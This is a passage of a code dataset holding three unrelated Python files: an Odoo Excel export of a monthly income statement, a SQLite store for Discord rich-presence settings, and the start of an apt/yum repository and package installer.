j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '03':\n\t\t\t\t\t\t\tline.marzo = j.monto_mes\n\t\t\t\t\t\t\tline.porc_marzo = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio3 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '04':\n\t\t\t\t\t\t\tline.abril = j.monto_mes\n\t\t\t\t\t\t\tline.porc_abril = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio4 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '05':\n\t\t\t\t\t\t\tline.mayo = j.monto_mes\n\t\t\t\t\t\t\tline.porc_mayo = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio5 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '06':\n\t\t\t\t\t\t\tline.junio = j.monto_mes\n\t\t\t\t\t\t\tline.porc_junio = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio6 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '07':\n\t\t\t\t\t\t\tline.julio = j.monto_mes\n\t\t\t\t\t\t\tline.porc_julio = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio7 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '08':\n\t\t\t\t\t\t\tline.agosto = j.monto_mes\n\t\t\t\t\t\t\tline.porc_agosto = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio8 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '09':\n\t\t\t\t\t\t\tline.septiembre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_septiembre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio9 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '10':\n\t\t\t\t\t\t\tline.octubre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_octubre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio10 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '11':\n\t\t\t\t\t\t\tline.noviembre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_noviembre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio11 = j.padre.tipo_cambio\n\t\t\t\t\t\telif i.code.split('/')[0] == '12':\n\t\t\t\t\t\t\tline.diciembre = j.monto_mes\n\t\t\t\t\t\t\tline.porc_diciembre = j.porcentaje_mes\n\t\t\t\t\t\t\tself.tipo_cambio12 = j.padre.tipo_cambio\n\n\n\t\"\"\" ----------------------------- REPORTE EXCEL ----------------------------- \"\"\"\n\n\t@api.multi\n\tdef export_excel(self):\n\t\timport io\n\t\tfrom xlsxwriter.workbook import Workbook\n\n\t\timport sys\n\t\treload(sys)\n\t\tsys.setdefaultencoding('iso-8859-1')\n\n\t\toutput = io.BytesIO()\n\t\t########### PRIMERA HOJA DE LA DATA EN TABLA\n\t\t#workbook = Workbook(output, {'in_memory': True})\n\n\t\tdireccion = self.env['main.parameter'].search([])[0].dir_create_file\n\t\tif not direccion:\n\t\t\traise osv.except_osv('Alerta!', u\"No fue configurado el directorio para los archivos en Configuracion.\")\n\n\t\tworkbook = Workbook(direccion +'Reporte_resultado_mexicano.xlsx')\n\t\tworksheet = workbook.add_worksheet(u\"Consolidado Resultado\")\n\t\tbold = workbook.add_format({'bold': True})\n\t\tnormal = workbook.add_format()\n\t\tboldbord = workbook.add_format({'bold': True})\n\t\tboldbord.set_border(style=2)\n\t\tboldbord.set_align('center')\n\t\tboldbord.set_align('vcenter')\n\t\tboldbord.set_text_wrap()\n\t\tboldbord.set_font_size(9)\n\t\tboldbord.set_bg_color('#DCE6F1')\n\t\tnumbertres = workbook.add_format({'num_format':'0.000'})\n\t\tnumberdos = workbook.add_format({'num_format':'#,##0.00'})\n\t\tbord = workbook.add_format()\n\t\tbord.set_border(style=1)\n\t\tnumberdos.set_border(style=1)\n\t\tnumbertres.set_border(style=1)\t\n\n\t\tboldtotal = workbook.add_format({'bold': True})\n\t\tboldtotal.set_align('right')\n\t\tboldtotal.set_align('vright')\n\n\t\tmerge_format = workbook.add_format({\n\t\t\t\t\t\t\t\t\t\t\t'bold': 
1,\n\t\t\t\t\t\t\t\t\t\t\t'border': 1,\n\t\t\t\t\t\t\t\t\t\t\t'align': 'center',\n\t\t\t\t\t\t\t\t\t\t\t'valign': 'vcenter',\n\t\t\t\t\t\t\t\t\t\t\t})\t\n\t\tmerge_format.set_bg_color('#DCE6F1')\n\t\tmerge_format.set_text_wrap()\n\t\tmerge_format.set_font_size(9)\n\n\n\t\tworksheet.insert_image('A2', 'calidra.jpg')\n\t\tworksheet.write(1,4, u'CALQUIPA {0}'.format(self.periodo_ini.code.split('/')[1]), bold)\n\t\tworksheet.write(3,4, 'Estado de Resultados', bold)\n\t\tworksheet.write(4,4, u'{0}'.format(self.periodo_ini.code.split('/')[1]), bold)\n\t\t\n\t\ttitlees = workbook.add_format({'bold': True})\n\t\ttitlees.set_align('center')\n\t\ttitlees.set_align('vcenter')\n\t\t\n\t\t#worksheet.merge_range(6,0,7,0,u'Nombre', boldbord)\n\n\t\tworksheet.merge_range(6,1,6,3, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio1), titlees)\n\t\tworksheet.merge_range(7,1,7,3, u'Enero', titlees)\n\t\tworksheet.write(8,1, u'Soles', titlees)\n\t\tworksheet.write(8,2, u'USD', titlees)\n\t\tworksheet.write(8,3, u'%', titlees)\n\n\t\tworksheet.merge_range(6,4,6,6, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio2), titlees)\n\t\tworksheet.merge_range(7,4,7,6, u'Febrero', titlees)\n\t\tworksheet.write(8,4, u'Soles', titlees)\n\t\tworksheet.write(8,5, u'USD', titlees)\n\t\tworksheet.write(8,6, u'%', titlees)\n\n\t\tworksheet.merge_range(6,7,6,9, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio3), titlees)\n\t\tworksheet.merge_range(7,7,7,9, u'Marzo', titlees)\n\t\tworksheet.write(8,7, u'Soles', titlees)\n\t\tworksheet.write(8,8, u'USD', titlees)\n\t\tworksheet.write(8,9, u'%', titlees)\n\n\t\tworksheet.merge_range(6,10,6,12, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio4), titlees)\n\t\tworksheet.merge_range(7,10,7,12, u'Abril', titlees)\n\t\tworksheet.write(8,10, u'Soles', titlees)\n\t\tworksheet.write(8,11, u'USD', titlees)\n\t\tworksheet.write(8,12, u'%', titlees)\n\n\t\tworksheet.merge_range(6,13,6,15, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio5), titlees)\n\t\tworksheet.merge_range(7,13,7,15, u'Mayo', titlees)\n\t\tworksheet.write(8,13, u'Soles', titlees)\n\t\tworksheet.write(8,14, u'USD', titlees)\n\t\tworksheet.write(8,15, u'%', titlees)\n\n\t\tworksheet.merge_range(6,16,6,18, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio6), titlees)\n\t\tworksheet.merge_range(7,16,7,18, u'Junio', titlees)\n\t\tworksheet.write(8,16, u'Soles', titlees)\n\t\tworksheet.write(8,17, u'USD', titlees)\n\t\tworksheet.write(8,18, u'%', titlees)\n\n\t\tworksheet.merge_range(6,19,6,21, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio7), titlees)\n\t\tworksheet.merge_range(7,19,7,21, u'Julio', titlees)\n\t\tworksheet.write(8,19, u'Soles', titlees)\n\t\tworksheet.write(8,20, u'USD', titlees)\n\t\tworksheet.write(8,21, u'%', titlees)\n\n\t\tworksheet.merge_range(6,22,6,24, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio8), titlees)\n\t\tworksheet.merge_range(7,22,7,24, u'Agosto', titlees)\n\t\tworksheet.write(8,22, u'Soles', titlees)\n\t\tworksheet.write(8,23, u'USD', titlees)\n\t\tworksheet.write(8,24, u'%', titlees)\n\n\t\tworksheet.merge_range(6,25,6,27, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio9), titlees)\n\t\tworksheet.merge_range(7,25,7,27, u'Septiembre', titlees)\n\t\tworksheet.write(8,25, u'Soles', titlees)\n\t\tworksheet.write(8,26, u'USD', titlees)\n\t\tworksheet.write(8,27, u'%', titlees)\n\n\t\tworksheet.merge_range(6,28,6,30, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio10), titlees)\n\t\tworksheet.merge_range(7,28,7,30, u'Octubre', titlees)\n\t\tworksheet.write(8,28, u'Soles', titlees)\n\t\tworksheet.write(8,29, u'USD', titlees)\n\t\tworksheet.write(8,30, u'%', 
titlees)\n\n\t\tworksheet.merge_range(6,31,6,33, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio11), titlees)\n\t\tworksheet.merge_range(7,31,7,33, u'Noviembre', titlees)\n\t\tworksheet.write(8,31, u'Soles', titlees)\n\t\tworksheet.write(8,32, u'USD', titlees)\n\t\tworksheet.write(8,33, u'%', titlees)\n\n\t\tworksheet.merge_range(6,34,6,36, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio12), titlees)\n\t\tworksheet.merge_range(7,34,7,36, u'Diciembre', titlees)\n\t\tworksheet.write(8,34, u'Soles', titlees)\n\t\tworksheet.write(8,35, u'USD', titlees)\n\t\tworksheet.write(8,36, u'%', titlees)\n\t\t\t\t\n\t\tworksheet.merge_range(6,37,6,39, u'T.C: ' + (\"%0.3f\"%self.tipo_cambio), titlees)\n\t\tworksheet.merge_range(7,37,7,39, u'Acumulado', titlees)\n\t\tworksheet.write(8,37, u'Soles', titlees)\n\t\tworksheet.write(8,38, u'USD', titlees)\n\t\tworksheet.write(8,39, u'%', titlees)\n\t\t\t\t\n\t\tx = 9\n\n\t\tfor i in self.env['consolidado.rm.resultado.mexicano.line'].search([('padre','=',self.id)]).sorted(lambda r : r.orden):\n\t\t\tif i.tipo_cuenta == '5':\n\n\t\t\t\tboldbordtmp = workbook.add_format({'bold': False})\n\t\t\t\tboldbordtmp.set_font_size(9)\n\t\t\t\tif i.resaltado:\n\t\t\t\t\tboldbordtmp = workbook.add_format({'bold': True})\n\t\t\t\t\tboldbordtmp.set_text_wrap()\n\t\t\t\t\tboldbordtmp.set_font_size(9)\n\t\t\t\tif i.bordes:\n\t\t\t\t\tboldbordtmp.set_border(style=2)\n\t\t\t\tworksheet.write(x,0, i.concepto if i.concepto else '',boldbordtmp)\n\t\t\t\tx+=1\n\t\t\telse:\t\t\t\n\t\t\t\tboldbordtmp = workbook.add_format({'bold': False})\n\t\t\t\tboldbordtmp.set_font_size(9)\n\t\t\t\tboldbordtmpRight = workbook.add_format({'bold': False})\n\t\t\t\tboldbordtmpRight.set_font_size(9)\n\t\t\t\tboldbordtmpRight.set_align('right')\n\t\t\t\tboldbordtmpRight.set_align('vright')\n\t\t\t\tnumberdostmp = workbook.add_format({'num_format':'#,##0.00'})\n\t\t\t\tnumberdostmp.set_font_size(9)\n\t\t\t\tif i.resaltado:\n\t\t\t\t\tboldbordtmp = workbook.add_format({'bold': True})\n\t\t\t\t\tboldbordtmp.set_text_wrap()\n\t\t\t\t\tboldbordtmp.set_font_size(9)\n\n\t\t\t\t\tboldbordtmpRight = workbook.add_format({'bold': True})\n\t\t\t\t\tboldbordtmpRight.set_text_wrap()\n\t\t\t\t\tboldbordtmpRight.set_align('right')\n\t\t\t\t\tboldbordtmpRight.set_align('vright')\n\t\t\t\t\tboldbordtmpRight.set_font_size(9)\n\n\t\t\t\t\tnumberdostmp = workbook.add_format({'bold': True})\n\t\t\t\t\tnumberdostmp.set_text_wrap()\n\t\t\t\t\tnumberdostmp.set_font_size(9)\n\t\t\t\tif i.bordes:\n\t\t\t\t\tboldbordtmp.set_border(style=2)\n\t\t\t\t\tnumberdostmp.set_border(style=2)\n\n\t\t\t\t\tboldbordtmpRight.set_border(style=2)\n\n\t\t\t\tif True:\n\t\t\t\t\tworksheet.write(x,0, i.concepto if i.concepto else '',boldbordtmp)\n\t\t\t\t\tworksheet.write(x,1, i.enero ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,2, i.enero / self.tipo_cambio1 if self.tipo_cambio1 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,3, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_enero)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,4, i.febrero ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,5, i.febrero / self.tipo_cambio2 if self.tipo_cambio2 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,6, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_febrero)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,7, i.marzo ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,8, i.marzo / self.tipo_cambio3 if self.tipo_cambio3 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,9, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % 
i.porc_marzo)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,10, i.abril ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,11, i.abril / self.tipo_cambio4 if self.tipo_cambio4 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,12, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_abril)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,13, i.mayo ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,14, i.mayo / self.tipo_cambio5 if self.tipo_cambio5 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,15, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_mayo)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,16, i.junio ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,17, i.junio / self.tipo_cambio6 if self.tipo_cambio6 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,18, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_junio)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,19, i.julio ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,20, i.julio / self.tipo_cambio7 if self.tipo_cambio7 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,21, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_julio)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,22, i.agosto ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,23, i.agosto / self.tipo_cambio8 if self.tipo_cambio8 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,24, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_agosto)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,25, i.septiembre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,26, i.septiembre / self.tipo_cambio9 if self.tipo_cambio9 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,27, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_septiembre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,28, i.octubre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,29, i.octubre / self.tipo_cambio10 if self.tipo_cambio10 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,30, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_octubre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,31, i.noviembre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,32, i.noviembre / self.tipo_cambio11 if self.tipo_cambio11 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,33, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_noviembre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,34, i.diciembre ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,35, i.diciembre / self.tipo_cambio12 if self.tipo_cambio12 != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,36, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.porc_diciembre)) +\" %\",boldbordtmpRight)\n\t\t\t\t\t\n\t\t\t\t\tworksheet.write(x,37, i.acum_anio ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,38, i.acum_anio / self.tipo_cambio if self.tipo_cambio != 0 else 0 ,numberdostmp)\n\t\t\t\t\tworksheet.write(x,39, '{:,.2f}'.format(decimal.Decimal (\"%0.2f\" % i.acum_porc)) +\" %\",boldbordtmpRight)\n\n\n\t\t\t\t\tx += 1\n\n\t\tt = 14.86\n\t\tworksheet.set_column('A:A', 49)\n\t\tworksheet.set_column('B:B', t)\n\t\tworksheet.set_column('C:C', t)\n\t\tworksheet.set_column('D:D', t)\n\t\tworksheet.set_column('E:E', t)\n\t\tworksheet.set_column('F:F', t)\n\t\tworksheet.set_column('G:G', t)\n\t\tworksheet.set_column('H:H', t)\n\t\tworksheet.set_column('I:I', t)\n\t\tworksheet.set_column('J:J', t)\n\t\tworksheet.set_column('K:K', t)\n\t\tworksheet.set_column('L:L', 
t)\n\t\tworksheet.set_column('M:M', t)\n\t\tworksheet.set_column('N:N', t)\n\t\tworksheet.set_column('O:O', t)\n\t\tworksheet.set_column('P:P', t)\n\t\tworksheet.set_column('Q:Q', t)\n\t\tworksheet.set_column('R:R', t)\n\t\tworksheet.set_column('S:S', t)\n\t\tworksheet.set_column('T:T', t)\n\t\tworksheet.set_column('U:U', t)\n\t\tworksheet.set_column('V:V', t)\n\t\tworksheet.set_column('W:W', t)\n\t\tworksheet.set_column('X:X', t)\n\t\tworksheet.set_column('Y:Y', t)\n\t\tworksheet.set_column('Z:Z', t)\n\t\tworksheet.set_column('AA:AA', t)\n\t\tworksheet.set_column('AB:AB', t)\n\t\tworksheet.set_column('AC:AC', t)\n\t\tworksheet.set_column('AD:AD', t)\n\t\tworksheet.set_column('AE:AE', t)\n\t\tworksheet.set_column('AF:AF', t)\n\t\tworksheet.set_column('AG:AG', t)\n\t\tworksheet.set_column('AH:AH', t)\n\t\tworksheet.set_column('AI:AI', t)\n\t\tworksheet.set_column('AJ:AJ', t)\n\t\tworksheet.set_column('AK:AK', t)\n\t\tworksheet.set_column('AL:AL', t)\n\t\tworksheet.set_column('AM:AM', t)\n\t\tworksheet.set_column('AN:AN', t)\n\n\t\tworkbook.close()\n\t\t\n\t\tf = open(direccion + 'Reporte_resultado_mexicano.xlsx', 'rb')\n\t\t\n\t\tvals = {\n\t\t\t'output_name': 'Consolidado Mexicanos Resultado.xlsx',\n\t\t\t'output_file': base64.encodestring(''.join(f.readlines())),\t\t\n\t\t}\n\n\t\tsfs_id = self.env['export.file.save'].create(vals)\n\t\treturn {\n\t\t\t\"type\": \"ir.actions.act_window\",\n\t\t\t\"res_model\": \"export.file.save\",\n\t\t\t\"views\": [[False, \"form\"]],\n\t\t\t\"res_id\": sfs_id.id,\n\t\t\t\"target\": \"new\",\n\t\t}\n\n\t\"\"\" ----------------------------- REPORTE EXCEL ----------------------------- \"\"\"","sub_path":"calquipa_reportemexicanos_parte1_it/reporte_consolidado_resultado.py","file_name":"reporte_consolidado_resultado.py","file_ext":"py","file_size_in_byte":22291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"56266728","text":"import time\nimport sqlite3\n\ndef set_up(cID):\n\tactivity = {\"startTimestamp\":time.time()}\n\tactivityKey = [\"state\", \"details\", \"largeImageKey\", \"largeImageText\", \"smallImageKey\", \"smallImageText\"]\n\n\tfor i in activityKey:\n\t\tanswer = input(f\"Enter {i} = \")\n\t\tactivity[i]=answer if not answer=='' else None\n\n\tbutton = input(\"Do you want set a button (yes/no) = \")\n\tif button.lower()=='yes' or button.lower()=='y':\n\t\tactivity[\"buttons\"]=[]\n\t\tfor i in range(2):\n\t\t\tnums = ['st','nd']\n\t\t\twhile True:\n\t\t\t\tlabel = input(f\"Enter the LABEL for {i+1}{nums[i]} button = \")\n\t\t\t\tif label=='':\n\t\t\t\t\tprint(\"LABEL cannot be empty please input again. \")\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\twhile True:\n\t\t\t\tbuttonLink = input(f\"Enter the URL for {i+1}{nums[i]} button = \")\n\t\t\t\tif label=='':\n\t\t\t\t\tprint(\"URL cannot be empty please input again. \")\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\tnewButton = {\"label\":label,\"url\":buttonLink}\n\t\t\tactivity[\"buttons\"].append(newButton)\n\t\t\tif i==0:\n\t\t\t\tbutton = input(\"Do you want a second button? 
(yes/no) = \")\n\t\t\t\tif button.lower()=='yes' or button.lower()=='y':\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\tif len(activity['buttons'])==0:\n\t\t\tactivity['buttons']=None\n\telse:\n\t\tactivity['buttons']=None\n\tsave_data(activity, cID)\n\n\treturn activity\n\ndef save_data(activity, cID):\n\tcon = sqlite3.connect('database.db')\n\tc = con.cursor()\n\tselect = c.execute('''SELECT name FROM sqlite_master WHERE type='table' AND name=\"discord\"''')\n\tif len(select.fetchall())==0:\n\t\tc.execute('''CREATE TABLE discord(id INT, clientid INT,details TEXT, state TEXT, largeImageKey TEXT, largeImageText TEXT, smallImageKey TEXT, smallImageText TEXT, btlbl1 TEXT, bturl1 TEXT, btlbl2 TEXT, bturl2 TEXT)''')\n\t\tcon.commit()\n\tif activity['buttons']==None:\n\t\tactivity['btlbl1']=\"\"\n\t\tactivity['bturl1']=\"\"\n\t\tactivity['btlbl2']=\"\"\n\t\tactivity['bturl2']=\"\"\n\telse:\n\t\tif(len(activity)==1):\n\t\t\tactivity['btlbl1']=activity['buttons'][0]['label']\n\t\t\tactivity['bturl1']=activity['buttons'][0]['url']\n\t\t\tactivity['btlbl2']=\"\"\n\t\t\tactivity['bturl2']=\"\"\n\t\telse:\n\t\t\tactivity['btlbl1']=activity['buttons'][0]['label']\n\t\t\tactivity['bturl1']=activity['buttons'][0]['url']\n\t\t\tactivity['btlbl2']=activity['buttons'][1]['label']\n\t\t\tactivity['bturl2']=activity['buttons'][1]['url']\n\n\ttask = (cID, activity['details'], activity['state'],activity['largeImageKey'],activity['largeImageText'],activity['smallImageKey'],activity['smallImageText'],activity['btlbl1'],activity['bturl1'],activity['btlbl2'],activity['bturl2'])\n\tselect = c.execute('''SELECT id FROM discord WHERE id=1''').fetchone()\n\tif select==None:\n\t\tsql = '''INSERT INTO discord(id,clientid,details,state,largeImageKey,largeImageText,smallImageKey,smallImageText,btlbl1,bturl1,btlbl2,bturl2) VALUES(1, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'''\n\telse:\n\t\tsql = '''UPDATE discord SET clientid=?, details=?, state=?, largeImageKey=?, largeImageText=?, smallImageKey=?, smallImageText=?, btlbl1=?, bturl1=?, btlbl2=?, bturl2=? 
WHERE id=1'''\n\tc.execute(sql,task)\n\tcon.commit()\n\tcon.close()\n\ndef storage():\n\tcon = sqlite3.connect('database.db')\n\tc = con.cursor()\n\tselect = c.execute('''SELECT name FROM sqlite_master WHERE type='table' AND name=\"discord\"''')\n\tif len(select.fetchall())==0:\n\t\tc.execute('''CREATE TABLE discord(id INT, clientid INT,details TEXT, state TEXT, largeImageKey TEXT, largeImageText TEXT, smallImageKey TEXT, smallImageText TEXT, btlbl1 TEXT, bturl1 TEXT, btlbl2 TEXT, bturl2 TEXT)''')\n\t\tcon.commit()\n\tselect = c.execute('''SELECT * FROM discord WHERE id=1''').fetchone()\n\tif select==None:\n\t\twhile True:\n\t\t\tcID = input(\"Enter client id = \")\n\t\t\tif not cID.isdigit():\n\t\t\t\tprint(\"Client Id can only be integer = \")\n\t\t\telse:\n\t\t\t\tbreak\n\t\tc.execute('''INSERT INTO discord(id,clientid,details,state,largeImageKey,largeImageText,smallImageKey,smallImageText,btlbl1,bturl1,btlbl2,bturl2) VALUES(1,?,\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\")''',(cID,))\n\t\tcon.commit()\n\t\tselect = (1,cID,\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\")\n\tcon.close()\n\treturn select\n\ndef existing_data():\n\tselect = storage()\n\tactivity = {\"startTimestamp\":time.time()}\n\tactivityKey = [\"clientId\",\"details\", \"state\", \"largeImageKey\", \"largeImageText\", \"smallImageKey\", \"smallImageText\"]\n\tfor i in range(7):\n\t\tactivity[activityKey[i]] = select[i+1] if not select[i+1]==\"\" else None\n\tif select[7]==\"\":\n\t\tactivity['buttons']=None\n\telse:\n\t\tactivity['buttons']=[]\n\t\tnewButton = {\"label\":select[8],\"url\":select[9]}\n\t\tactivity['buttons'].append(newButton)\n\t\tif not select[9]==\"\":\n\t\t\tnewButton = {\"label\":select[10],\"url\":select[11]}\n\t\t\tactivity['buttons'].append(newButton)\n\treturn activity\n\ndef update_specific_data(change):\n\tdata = input(f\"Enter {change} = \")\n\tsql = f'UPDATE discord SET {change}=? 
WHERE id=1'\n\tcon = sqlite3.connect('database.db')\n\tc = con.cursor()\n\tc.execute(sql,(data,))\n\tcon.commit()\n\tcon.close()\n\n","sub_path":"build/lib/pyrpc/funcmodule.py","file_name":"funcmodule.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"635747163","text":"import os\nimport sys\nimport subprocess\nfrom codecs import open\n\ndef log(line):\n sys.stdout.write(line)\n sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\ndef exec_and_collects(argv, dry_run=False):\n log(\"+ {}\".format(argv))\n if dry_run:\n log(\"*** Dry run ***\")\n else:\n subprocess.check_call(argv, stderr=subprocess.STDOUT)\n\ndef write_file(filename, data, dry_run=False):\n log(\"+ [write '{}']\\n{}\".format(filename, data))\n if not dry_run:\n with open(filename, \"w\", \"utf-8\") as f:\n f.write(data)\n else:\n log(\"*** Dry run ***\\n\")\n\nclass BaseBackend:\n def __init__(self, verify_ssl=True, dry_run=False):\n self.dry_run = dry_run\n self.verify_ssl = verify_ssl\n \n def prepare(self):\n pass\n\nclass DebBackend(BaseBackend):\n DEFAULT_KEY = \"40554B8FA5FE6F6A\"\n \n def __init__(self, *args, **kwargs):\n BaseBackend.__init__(self, *args, **kwargs)\n self.apt_opts = []\n if not self.verify_ssl:\n log(\"Warning: ignoring SSL errors!\")\n self.apt_opts.extend(('-o', 'Acquire::https::Verify-Peer=false', '-o', 'Acquire::https::Verify-Host=false'))\n \n def install_packages(self, packages):\n argv = [\"apt-get\", \"install\", \"-y\"] + self.apt_opts + packages\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def remove_packages(self, packages):\n argv = [\"apt-get\", \"remove\", \"-y\"] + self.apt_opts + packages\n try:\n exec_and_collects(argv, dry_run=self.dry_run)\n except subprocess.CalledProcessError as e:\n log(str(e))\n \n def add_repositories(self, protocol, server, username, token, products, dist_release, variants):\n protocol = protocol or \"https\"\n variants = \" \".join(variants)\n sources_dir = \"/etc/apt/sources.list.d\"\n log(\"+ [makedirs '{}']\".format(sources_dir))\n if not self.dry_run:\n os.makedirs(sources_dir, exist_ok=True)\n \n auth = \"{}:{}@\".format(username, token) if username and token else \"\"\n for product in products:\n filename = \"{}/tiliado-{}.list\".format(sources_dir, product)\n apt_line = \"deb {protocol}://{auth}{server}/{project}/repository/deb/ {release} {components} # {product} ({components})\\n\".format(\n product=product,\n server=server,\n protocol=protocol,\n auth=auth,\n project=product,\n release=dist_release,\n components=variants)\n write_file(filename, apt_line, dry_run=self.dry_run)\n \n def add_key(self, key):\n argv = [\"apt-key\", \"adv\", \"--keyserver\", \"hkp://keyserver.ubuntu.com:80\", \"--recv-keys\", key]\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def update_db(self):\n argv = [\"apt-get\", \"update\"] + self.apt_opts\n try:\n exec_and_collects(argv, dry_run=self.dry_run)\n except subprocess.CalledProcessError as e:\n log(\"\\nWarning: Database update command failed, probably because of broken repositories in your APT sources lists. 
Error code:\".format(e.returncode))\n\nclass YumBackend(BaseBackend):\n DEFAULT_KEY = \"40554B8FA5FE6F6A\"\n \n def __init__(self, *args, **kwargs):\n BaseBackend.__init__(self, *args, **kwargs)\n self.yum_opts = []\n #~ if not self.verify_ssl:\n #~ log(\"Warning: ignoring SSL errors!\")\n #~ self.apt_opts.extend(('-o', 'Acquire::https::Verify-Peer=false', '-o', 'Acquire::https::Verify-Host=false'))\n \n def install_packages(self, packages):\n argv = [\"yum\", \"install\", \"-y\"] + self.yum_opts + packages\n exec_and_collects(argv, dry_run=self.dry_run)\n \n def remove_packages(self, packages):\n argv = [\"yum\", \"remove\", \"-y\"] + self.yum_opts + packages\n try:\n exec_and_collects(argv, dry_run=self.dry_run)\n except subprocess.CalledProcessError as e:\n log(str(e))\n \n def add_repositories(self, protocol, server, username, token, products, dist_release, variants):\n protocol = protocol or \"https\"\n sources_dir = \"/etc/yum.repos.d\"\n log(\"+ [makedirs '{}']\".format(sources_dir))\n if not self.dry_run:\n try:\n os.makedirs(sources_dir)\n except 